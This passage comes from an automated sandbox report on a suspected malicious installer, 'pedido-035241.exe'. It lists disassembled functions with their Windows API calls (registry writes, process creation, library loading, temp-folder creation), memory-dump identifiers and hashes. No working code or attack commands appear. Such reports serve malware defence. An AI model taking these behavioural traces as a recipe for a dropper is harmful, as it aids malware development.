                                                                                                                                                                            • Instruction Fuzzy Hash: BA213673904210EBD720AFA4DEC5E5E72A4EB08328715093BF552B72D1D6BCE8518B5D
                                                                                                                                                                            Function 0040248A Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseValuelstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2655323295-0
                                                                                                                                                                            • Opcode ID: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                                                                                                                                            • Instruction ID: 742bbefa47e989f243bf6062c522ac596cbc11b4bfeba2949f21d1d9b27b1258
                                                                                                                                                                            • Opcode Fuzzy Hash: 115faf02d334c89f827882088b0be8a93b9cbe5759b9d35681ab44e4bb566471
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B11AC71E00108BEEB10AFA1DE49EAEBAB8FF44358F10403AF404B61C1D7B88D409A68
                                                                                                                                                                            Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Enum$CloseValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 397863658-0
                                                                                                                                                                            • Opcode ID: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
                                                                                                                                                                            • Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
                                                                                                                                                                            • Opcode Fuzzy Hash: eb6c8e15ee44575ea420681c9cc2a7e67ba876646878e1eb00c8e7fc00d42c1f
                                                                                                                                                                            • Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                                                                                                                            Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                            • Opcode ID: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                            • Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
                                                                                                                                                                            • Opcode Fuzzy Hash: 06d9a8ad9cd75b344e281f0f33afa87d54a5442f7653d28a97a29c4d8ae17323
                                                                                                                                                                            • Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E
                                                                                                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                            • Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
                                                                                                                                                                            • Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C
                                                                                                                                                                            Function 0040563C Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040564C
                                                                                                                                                                              • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            • CoUninitialize.COMBASE(00000404,00000000,?,00000000,?), ref: 00405698
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2896919175-0
                                                                                                                                                                            • Opcode ID: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
                                                                                                                                                                            • Instruction ID: e8a19e3ae465cdfca2bef1253819f9a2a21047bc58a71dd1e8c92fd5a8ca6894
                                                                                                                                                                            • Opcode Fuzzy Hash: a1e7d01539343cbedca50b7a5125379b8eaabd142d8c7e4c73993699b28e4919
                                                                                                                                                                            • Instruction Fuzzy Hash: EFF0F0B2600600DBE3115754A901B677364EB80304F85497AEF88623E1CB3B0C128A2E
                                                                                                                                                                            Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnableShow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1136574915-0
                                                                                                                                                                            • Opcode ID: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                                                                                                                                            • Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
                                                                                                                                                                            • Opcode Fuzzy Hash: d503c9f13438e3c869f1bbfba4ca0b9980fccaccea62ec0994004058657006bf
                                                                                                                                                                            • Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D
                                                                                                                                                                            Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405B20
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                            • Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                            • Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
                                                                                                                                                                            • Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C
                                                                                                                                                                            Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                                                                                                                                                              • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                              • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                              • Part of subcall function 00406864: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                            • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                                                                                                                                                                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                                                                                                                            • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                                                                                                                                                                            Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\pedido-035241.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                                                                                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                                                                                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                                                                                            Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                            • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                                                                                                                                                                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                                                                                                            • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                                                                                                                                                                            Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405AC9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                            • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                                                                                                                                                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                            • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                                                                                                                                                                            Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
